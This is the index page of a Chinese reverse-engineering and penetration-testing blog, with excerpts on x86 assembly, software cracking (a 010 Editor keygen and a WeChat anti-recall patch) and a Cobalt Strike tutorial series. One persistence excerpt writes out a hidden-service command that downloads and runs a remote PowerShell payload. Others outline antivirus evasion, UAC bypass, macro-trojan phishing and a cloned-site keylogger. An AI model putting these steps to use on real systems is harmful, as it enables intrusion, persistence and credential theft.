xiaoeryu
搜索

xiaoeryu

指令的格式及其操作尺寸
发表于2022-12-11|X86汇编:实模式到保护模式
01. 80286的16位保护模式 80286的寄存器和8086有同样的寄存器 2. 80286的描述符有48位 {% asset_img 89ef06a022ca9dfcc82e9db73a4dbd5a.png 80286描述符格式 %} 3. 80286也引入了描述符, 描述符表, 描述符高速缓存器, 段选择子的概念 {% asset_img 50daf97b92479e82b0a8e32a76b16a03.png %} 4. 80286的地址线有24位可以寻址16M空间的任意地址, 但是只有16位偏移, 所以确定了段地址后只能在1M的空间内偏移 {% asset_img 8a96c9a8dc8774e1d9b3161716de41f8.png %} {% asset_img 7cafe51b7eda396fb20e58546a24b41f.png %} 02. 16位处理器的指令操作尺寸 1.指令的操作尺寸 2. ...
进入保护模式
发表于2022-12-11|X86汇编:实模式到保护模式
保护模式是要保护什么 全局描述符表GDT和全局描述符表寄存器GDTR 保护模式下: 对内存的访问让然使用段地址和偏移地址, 但是, 在每个段能够访问之前, 必须先进性登记 超出范围的访问会产生一个内部异常的中断 和一个段有关的信息需要八个字节(64位)来描述, 称之为段描述符, 而在内存中存放这些描述符的地方就叫做描述符表 全局描述符表(GDT): 顾名思义是为整个计算机硬件系统服务的, 进入保护模式之前由系统定义 (GDTR): 描述符表寄存器(48位) 准备创建全局描述符表 寻址GDT起始地址的方法 从CS段主引导程序0x7c00+gdt_base获取到GDT的起始地址, 然后除以16分别讲余数和商放入dx和ax中(16位(除数) (dx高位和ax低位拼接)(被除数) ax(商) dx(余数)) ;计算GDT所在的逻辑段地址 mov ax,[cs:gdt_base+0x7c00] ;低16位 mov dx,[cs:gdt_base+0x7c00+0x02] ...
Andromeda木马分析
发表于2022-11-14|样本分析
...
010EDIT破解&注册机
发表于2021-09-08|Win逆向
010edit是一款非常好用的二进制文本编辑器,但是这款软件不是免费的,so让我们来分析一下它的算法,写一下注册机。 环境:win7 32虚拟机,OD,IDA 分析目标 编写注册机 去除网络验证 开始分析0x00 今天我们分析的是9.0版本 0x01 开始分析,我们点击register按钮,弹出来窗口让我们输入用户名&密码 随便先输入了一组用户名和密码,弹出了提示窗口,接下来我们用OD打开010来查找这个字符串 双击找到字符串的位置,往上分析看是从什么地方跳过来的,通过下断点尝试我们找到了这个它做验证的位置 0x02 接下来我们对关键算法函数进行详细分析 在这里我们发现指令对我们输入的密码进行了一系列的操作验证 我们需要把对密码的验证操作逐条分析出来,便于写注册机时使用 通过对这一块的分析,我们得到了密码的验证规则,接下来我们写代码尝试验证看我们分析的是否正确 #include "stdafx.h" #include <Windows.h> #include<time.h> int main() { ...
VMware问题汇总
发表于2021-06-09|工具
记录一下,VMware使用过程中出现的问题以及解决方法 恢复快照出错有时候在恢复快照的时候会出现找不到所需文件,无法恢复快照的问题 找到虚拟机的.vmx文件将第一个scsi0.present字段改为FALSE之后再恢复快照即可 安装vmtools按钮灰色无法安装vmtools将存储设置都改为自动检测即可,重新开机就可以重新安装vmtools了 如果ubuntu22.04安装的vmtools不起作用,试试安装open-vm-tools-desktop sudo apt-get install open-vm-tools-desktop 安装之后重启切换用户到xorg 有时候重启切换用户不生效,就注销用户重新切换一下
资本主义和社会主义
发表于2021-06-08|社科
2021/6/8马克思认为资本主义发展方向,是资本占有的社会化,走向社会主义,从资本占有的角度来说就是社会资本主义。其中的关键是,资本占有的载体不是私人为主,而应该是公有制前提下的国家持有和社会占有。是社会化占比更高的国家-社会混合型经济。 社会资本主义的承载主体,可以是社会企业、合作社、集体所有的股份公司、全员持股公司等等。 这个意义上,国有企业、社会企业、集体经济都是属于社会资本的范畴。 国有企业如果被变相搞私有化,就是假的社会资本。
微信防撤回
发表于2021-06-07|Win逆向
目标阻止PC版微信消息撤回 分析 再微信程序文件夹搜索关键字:撤回是revoke撤回消息我们搜索revokemsg关键字 通过搜索关键字确定消息撤回的功能大概率在这个dll文件里 开始用x32Dbg加载微信分析这个dll 2.1. 找到这个dll之后,在这个dll里面搜索字符串revokemsg 2.2. 找到第一个revokemsg字符串 2.3. 双击点进去到反汇编可以看到上面有一个条件跳转,将跳转改为无条件跳转jmp 2.4. 右键补丁保存即可
Cobalt-Strike-十-可持续后门的使用
发表于2021-06-07|渗透
服务自启动 先创建一个与目标机的连接并提升权限 再使用以下命令来创建自启动服务有两种方式 2.1. 一种是从远程通过web下载shell来执行自启动服务 shell sc create "Windows Power" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.3.58:81/a'))\"" shell sc config "Windows Power" start= auto shell sc description "Windows Power" "windows auto service" shell net start "Windows Power" // 启动服务 shell sc delete "Windows Power" // 删除服务 2.2. 通过执行本地的后门程序来启动 shell sc create "server power" binpath=...
Cobalt-Strike-九 免杀(一)
发表于2021-06-03|渗透
Veil免杀安装网上有很多的安装方法:安装很简单输入命令sudo apt install veil然后一直确定下一步就可以了,安装时间较长 安装方法 安装的过程中先使用CS生成一个payload 使用安装完成后输入veil可以启动veil工具 安装完成可以看到有 Evasion和Ordnace 两个工具:Evasion是用来做==文件免杀==的一般来说选用的比较多 输入use 1选用Evasion list查看可用的payloads 输入use 17这里我们选择一个go 的注入payload 输入generate选择生成payload 输入3选择自定义类型字符串,然后将我们前面生成的payload放进去回车执行 然后再给输入个名字:不需要输入后缀名 将生成后的文件拷贝出来拿到vt上查杀一下 被一大半的杀软检测出来了(安装了360和火绒也过不去,会直接被检测出来) HanzoInjection 方法HanzoIjection 是一种工具,专注于在内存中注入任意代码以绕过常见的防病毒解决方案 下载链接 Arguments...
Cobalt-Strike-八 提权
发表于2021-06-02|渗透
提权顾名思义简单来说就是将普通用户的权限提升至管理员权限 Bypass UAC什么是UAC用户帐户控制(User Account Control,简写作UAC)是微软公司在其Windows Vista及更高版本操作系统中采用的一种控制机制。其原理是通知用户是否对应用程序使用硬盘驱动器和系统文件授权,以达到帮助阻止恶意程序(有时也称为“恶意软件”)损坏系统的效果。 使用提权点击选择Elevate 这里有两种默认自带的两种提权方式:直接选择使用,试过之后在win7上都可以成功提权 powerup提权下载powershell脚本 https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc 命令上传脚本 powershell-import 执行上传的脚本 powershell invoke-allchecks 未完待续
Cobalt-Strike-七 Cobalt Strike鱼叉钓鱼
发表于2021-06-01|渗透
鱼叉钓鱼鱼叉式网络钓鱼(Spear phishing)指一种源于亚洲与东欧只针对特定目标进行攻击的网络钓鱼攻击。 鱼叉式网络钓鱼攻击针对特定组织内的特定目标个体。电子威胁 形势已发生了极大变化,从大量的垃圾邮件转向具有针对性的电 子邮件网络钓鱼活动,后者可对全球组织造成重大的财务、品牌和 运营损失。 例如,攻击者更加关注 高管和其他具有管理员权限的雇员,诱使其启动恶意软件,让犯罪 分子进入公司环境。这可能是勒索软件,先加密公司数据,然后借 机向受害者勒索费用。 邮箱钓鱼模块使用​ cobalt strike提供了一个邮箱钓鱼模块 ​ 我们来看一下这个模块怎么使用 targets:创建一个新的文件​ 填写的内容记得邮箱和名字之间用tab隔开 ​ template:找一个新的邮件点击显示邮件原文 将内容全部拷贝下来 粘贴进文件中 填入文件路径 Attachment:这个可以用来上传附件,暂时先不用这个Embed URL:这里填入想跳转到的网址例如填写163邮箱的登陆页面​ https://mail.163.com/ ​ 填写发送邮箱的信息​ Bounce...
Cobalt-Strike-六
发表于2021-05-31|渗透
Cobalt Strike进行钓鱼攻击一. 生成后门 ​ 以宏病毒为例 宏病毒:点击选项卡生成office宏病毒,并选择一个合适的监听器,然后可以看到弹出下图的提示卡片 按照卡片提示,新建word文档,点击查看宏 2.1. 创建宏 2.2. 用CS生成的宏木马替换原有的宏代码 ​ 2.3. 保存创建的word文档 ​ 打卡word就能够看到已经上线 二. 钓鱼模块 web管理模块:可以看到我们生成的所有web模块 克隆网站:对克隆网站进行键盘记录 2.1. 在web log窗口可以看到我们在网页输入的内容 ​ 克隆网站:执行下载木马 3.1 先来生成一个hta文件 ​ 3.2. 然后将生成的hta文件托管到cs:修改一下Local URL的文件名 ​ 3.3. 会生成一个url ​ http://192.168.3.8:80/update.hta 3.4. 选择克隆网站功能:填写要克隆的网站和用来下载的木马 ​ 3.5....
1…78910
avatar
xiaoeryu
文章
114
标签
92
分类
14
Follow Me
公告
同于道者,希言自然
最新文章
绕过某邦企业壳root、frida检测2025-06-05
某麦购票Xposed脚本(一)2025-05-28
某麦APP购票接口分析2025-05-05
微信小程序-某某牛仔城2024-09-16
编译Android13-AOSP2024-08-10
分类
  • ARM汇编1
  • Android逆向61
    • 加密解密6
  • NDK开发8
  • Win逆向9
  • X86汇编:实模式到保护模式11
  • ios逆向1
  • 加密解密2
标签
JNI函数注册原理与追踪 AOSP源码编译 windows木马 环境配置 Windows脱壳 AES Android源码分析 Android脱壳 加解密算法分析 脱壳 Android刷机 学习笔记 RSA x86协同式任务切换 Frida Hook 加壳和运行时的机制 OceanLotus 重打包 Android加壳 暴力解密 NDK简介 X86寄存器指令格式 x86中断和异常 JavaVM与JNIEnv NDK性能 处理各种参数的方法 DES 微信小程序逆向 分组密码 x86内核任务系统 App抓包 RPC 环境搭建 抢茅台 Frida反调试 Andromeda木马 X86描述符表 加密解密 -Cobalt Strike 函数抽取壳
归档
  • 六月 2025 1
  • 五月 2025 2
  • 九月 2024 1
  • 八月 2024 3
  • 七月 2024 7
  • 六月 2024 5
  • 五月 2024 1
  • 四月 2024 1
网站信息
文章数目 :
114
本站总字数 :
185.4k
本站访客数 :
本站总浏览量 :
最后更新时间 :
©2019 - 2025 By xiaoeryu
框架 Hexo 6.3.0|主题 Butterfly 5.3.5
搜索
数据加载中